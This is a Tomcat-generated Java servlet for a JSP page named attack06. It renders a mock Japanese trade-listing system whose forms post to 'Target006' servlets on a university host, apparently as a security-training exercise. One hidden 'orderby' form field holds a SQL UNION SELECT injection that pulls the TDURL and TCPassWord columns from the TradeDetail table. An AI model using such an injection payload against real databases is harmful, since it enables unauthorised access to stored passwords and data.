/*
 * Generated by the Jasper component of Apache Tomcat
 * Version: Apache Tomcat/8.0.26
 * Generated at: 2016-12-04 09:01:56 UTC
 * Note: The last modified time of this file was set to
 *       the last modified time of the source file after
 *       generation to assist with modification tracking.
 */
package org.apache.jsp;

import javax.servlet.*;
import javax.servlet.http.*;
import javax.servlet.jsp.*;

public final class attack06_jsp extends org.apache.jasper.runtime.HttpJspBase
    implements org.apache.jasper.runtime.JspSourceDependent,
                 org.apache.jasper.runtime.JspSourceImports {

  private static final javax.servlet.jsp.JspFactory _jspxFactory =
          javax.servlet.jsp.JspFactory.getDefaultFactory();

  private static java.util.Map<java.lang.String,java.lang.Long> _jspx_dependants;

  private static final java.util.Set<java.lang.String> _jspx_imports_packages;

  private static final java.util.Set<java.lang.String> _jspx_imports_classes;

  static {
    _jspx_imports_packages = new java.util.HashSet<>();
    _jspx_imports_packages.add("javax.servlet");
    _jspx_imports_packages.add("javax.servlet.http");
    _jspx_imports_packages.add("javax.servlet.jsp");
    _jspx_imports_classes = null;
  }

  private javax.el.ExpressionFactory _el_expressionfactory;
  private org.apache.tomcat.InstanceManager _jsp_instancemanager;

  public java.util.Map<java.lang.String,java.lang.Long> getDependants() {
    return _jspx_dependants;
  }

  public java.util.Set<java.lang.String> getPackageImports() {
    return _jspx_imports_packages;
  }

  public java.util.Set<java.lang.String> getClassImports() {
    return _jspx_imports_classes;
  }

  public void _jspInit() {
    _el_expressionfactory = _jspxFactory.getJspApplicationContext(getServletConfig().getServletContext()).getExpressionFactory();
    _jsp_instancemanager = org.apache.jasper.runtime.InstanceManagerFactory.getInstanceManager(getServletConfig());
  }

  public void _jspDestroy() {
  }

  public void _jspService(final javax.servlet.http.HttpServletRequest request, final javax.servlet.http.HttpServletResponse response)
        throws java.io.IOException, javax.servlet.ServletException {

final java.lang.String _jspx_method = request.getMethod();
if (!"GET".equals(_jspx_method) && !"POST".equals(_jspx_method) && !"HEAD".equals(_jspx_method) && !javax.servlet.DispatcherType.ERROR.equals(request.getDispatcherType())) {
response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED, "JSPs only permit GET POST or HEAD");
return;
}

    final javax.servlet.jsp.PageContext pageContext;
    javax.servlet.http.HttpSession session = null;
    final javax.servlet.ServletContext application;
    final javax.servlet.ServletConfig config;
    javax.servlet.jsp.JspWriter out = null;
    final java.lang.Object page = this;
    javax.servlet.jsp.JspWriter _jspx_out = null;
    javax.servlet.jsp.PageContext _jspx_page_context = null;


    try {
      response.setContentType("text/html;   charset=UTF-8");
      pageContext = _jspxFactory.getPageContext(this, request, response,
      			null, true, 8192, true);
      _jspx_page_context = pageContext;
      application = pageContext.getServletContext();
      config = pageContext.getServletConfig();
      session = pageContext.getSession();
      out = pageContext.getOut();
      _jspx_out = out;

      out.write("\r\n");
      out.write("\r\n");
      out.write("\r\n");
      out.write("<!DOCTYPE html>\r\n");
      out.write("<html lang=\"ja\">\r\n");
      out.write("<head>\r\n");
      out.write("<meta charset=\"utf-8\">\r\n");
      out.write("</head>\r\n");
      out.write("<body>\r\n");
      out.write("\r\n");
      out.write("\t<hr>\r\n");
      out.write("\t<table width=\"100%\">\r\n");
      out.write("\t\t<tr align=\"center\" bgcolor=\"skyblue\">\r\n");
      out.write("\t\t\t<td>ジャパネット よしだ 取引情報管理システム</td>\r\n");
      out.write("\t\t</tr>\r\n");
      out.write("\t</table>\r\n");
      out.write("\t<hr>\r\n");
      out.write("\t<center>\r\n");
      out.write("\r\n");
      out.write("\t\t<p>\r\n");
      out.write("\t\t\tようこそ「kakushitayo@kjs.nagaokaut.ac.jp」さん <br> <br> Trade\r\n");
      out.write("\t\t</p>\r\n");
      out.write("\r\n");
      out.write("\t\t<Table border=\"1\" align=\"center\">\r\n");
      out.write("\t\t\t<tr bgcolor=yellow align=\"center\">\r\n");
      out.write("\t\t\t\t<td width=\"100px\">\r\n");
      out.write("\t\t\t\t\t<table>\r\n");
      out.write("\t\t\t\t\t\t<tr>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\" value=\"UNION SELECT NULL AS TDNumber, TDURL AS TDCustomerName, TCPassWord AS TDName, NULL AS TDPrice, NULL AS TDCode FROM TradeDetail\">\r\n");
      out.write("\t\t\t\t\t\t\t\t<!-- <input type=\"hidden\" name=\"orderby\" value=\"ORDER BY TDNumber\"> -->\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\"▲\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"ORDER BY TDNumber desc\"> <input type=\"submit\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"▼\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t</tr>\r\n");
      out.write("\t\t\t\t\t</table> 取引番号\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t<td width=\"100px\">\r\n");
      out.write("\t\t\t\t\t<table>\r\n");
      out.write("\t\t\t\t\t\t<tr>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"ORDER BY TDcustomerName\"> <input type=\"submit\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"▲\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"ORDER BY TDcustomerName desc\"> <input\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\ttype=\"submit\" value=\"▼\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t</tr>\r\n");
      out.write("\t\t\t\t\t</table> 取引先名\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t<td width=\"200px\">\r\n");
      out.write("\t\t\t\t\t<table>\r\n");
      out.write("\t\t\t\t\t\t<tr>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\" value=\"ORDER BY TDName\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\"▲\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"ORDER BY TDName desc\"> <input type=\"submit\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"▼\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t</tr>\r\n");
      out.write("\t\t\t\t\t</table> 取引名\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t<td width=\"100px\">\r\n");
      out.write("\t\t\t\t\t<table>\r\n");
      out.write("\t\t\t\t\t\t<tr>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\" value=\"ORDER BY TDPrice\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\"▲\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeListServlet06\">\r\n");
      out.write("\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"orderby\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"ORDER BY TDPrice desc\"> <input type=\"submit\"\r\n");
      out.write("\t\t\t\t\t\t\t\t\t\tvalue=\"▼\">\r\n");
      out.write("\t\t\t\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t\t\t</tr>\r\n");
      out.write("\t\t\t\t\t</table> 取引価格\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t\t<td></td>\r\n");
      out.write("\t\t\t</tr>\r\n");
      out.write("\r\n");
      out.write("\t\t\t<tr>\r\n");
      out.write("\t\t\t\t<td align=\"right\">1</td>\r\n");
      out.write("\t\t\t\t<td>NTT</td>\r\n");
      out.write("\t\t\t\t<td>専用回線設置</td>\r\n");
      out.write("\t\t\t\t<td align=\"right\">1000000円</td>\r\n");
      out.write("\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeDetailServlet06\">\r\n");
      out.write("\t\t\t\t\t\t<input type=hidden name=\"code\" value=1001> <input\r\n");
      out.write("\t\t\t\t\t\t\ttype=submit value=\"取引詳細\">\r\n");
      out.write("\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t</tr>\r\n");
      out.write("\r\n");
      out.write("\t\t\t<tr>\r\n");
      out.write("\t\t\t\t<td align=\"right\">2</td>\r\n");
      out.write("\t\t\t\t<td>AU</td>\r\n");
      out.write("\t\t\t\t<td>アンテナ設置</td>\r\n");
      out.write("\t\t\t\t<td align=\"right\">2000000円</td>\r\n");
      out.write("\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeDetailServlet06\">\r\n");
      out.write("\t\t\t\t\t\t<input type=hidden name=\"code\" value=1002> <input\r\n");
      out.write("\t\t\t\t\t\t\ttype=submit value=\"取引詳細\">\r\n");
      out.write("\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t</tr>\r\n");
      out.write("\r\n");
      out.write("\t\t\t<tr>\r\n");
      out.write("\t\t\t\t<td align=\"right\">3</td>\r\n");
      out.write("\t\t\t\t<td>SoftBank</td>\r\n");
      out.write("\t\t\t\t<td>iPhone購入</td>\r\n");
      out.write("\t\t\t\t<td align=\"right\">1500000円</td>\r\n");
      out.write("\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeDetailServlet06\">\r\n");
      out.write("\t\t\t\t\t\t<input type=hidden name=\"code\" value=1003> <input\r\n");
      out.write("\t\t\t\t\t\t\ttype=submit value=\"取引詳細\">\r\n");
      out.write("\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t</tr>\r\n");
      out.write("\r\n");
      out.write("\t\t\t<tr>\r\n");
      out.write("\t\t\t\t<td align=\"right\">4</td>\r\n");
      out.write("\t\t\t\t<td>NUT</td>\r\n");
      out.write("\t\t\t\t<td>紹介ビデオ作成</td>\r\n");
      out.write("\t\t\t\t<td align=\"right\">3000000円</td>\r\n");
      out.write("\t\t\t\t<td>\r\n");
      out.write("\t\t\t\t\t<form method=\"post\" action=\"http://mis.nagaokaut.ac.jp:8080/Target006/TradeDetailServlet06\">\r\n");
      out.write("\t\t\t\t\t\t<input type=hidden name=\"code\" value=yamabukiironoosonaemonodegozaimasu> <input\r\n");
      out.write("\t\t\t\t\t\t\ttype=submit value=\"取引詳細\">\r\n");
      out.write("\t\t\t\t\t</form>\r\n");
      out.write("\t\t\t\t</td>\r\n");
      out.write("\t\t\t</tr>\r\n");
      out.write("\r\n");
      out.write("\t\t</table>\r\n");
      out.write("\r\n");
      out.write("\r\n");
      out.write("\r\n");
      out.write("\t</center>\r\n");
      out.write("</body>\r\n");
      out.write("</html>\r\n");
    } catch (java.lang.Throwable t) {
      if (!(t instanceof javax.servlet.jsp.SkipPageException)){
        out = _jspx_out;
        if (out != null && out.getBufferSize() != 0)
          try {
            if (response.isCommitted()) {
              out.flush();
            } else {
              out.clearBuffer();
            }
          } catch (java.io.IOException e) {}
        if (_jspx_page_context != null) _jspx_page_context.handlePageException(t);
        else throw new ServletException(t);
      }
    } finally {
      _jspxFactory.releasePageContext(_jspx_page_context);
    }
  }
}
